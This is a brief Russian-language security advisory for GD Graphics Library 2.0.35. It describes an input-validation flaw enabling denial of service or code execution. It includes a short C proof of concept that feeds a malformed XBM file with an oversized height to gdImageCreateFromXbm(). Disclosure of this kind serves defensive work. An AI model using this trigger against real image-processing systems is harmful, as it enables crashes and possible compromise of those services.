Программа: GD Graphics library 2.0.35

Уязвимость позволяет удаленному злоумышленнику осуществить DoS атаку или выполнить произвольный код на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных в функции gdImageCreateTrueColor(). Атакующий может передать специально сформированные данные, что приведет к отказу системы в обслуживании или выполнению произвольного кода.

Пример:

#include "gd.h"
int main() {
    FILE *fp = fopen("./x.xbm", "w+");
    fprintf(fp, "#define width 255\n#define height 1073741824\nstatic unsigned char bla = {\n");
    fseek(fp, 0, SEEK_SET);
    gdImageCreateFromXbm(fp);
}



Оставить мнение